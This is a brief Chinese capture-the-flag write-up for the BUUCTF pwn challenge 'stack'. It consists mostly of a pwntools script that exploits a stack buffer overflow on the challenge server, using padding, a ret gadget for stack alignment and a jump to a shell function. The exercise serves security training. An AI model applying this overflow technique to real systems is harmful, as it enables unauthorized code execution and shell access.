[BUUCTF-pwn]——[第六章 CTF之PWN章]stack
思路
一个简单的栈溢出, 注意栈平衡就好
exploit
from pwn import *
p = remote('node3.buuoj.cn',25385)
shell = 0x0000000000400537
ret = 0x000000000040054E
payload = 'a' * (0xa + 8) + p64(ret) + p64(shell)
p.sendline(payload)
p.interactive()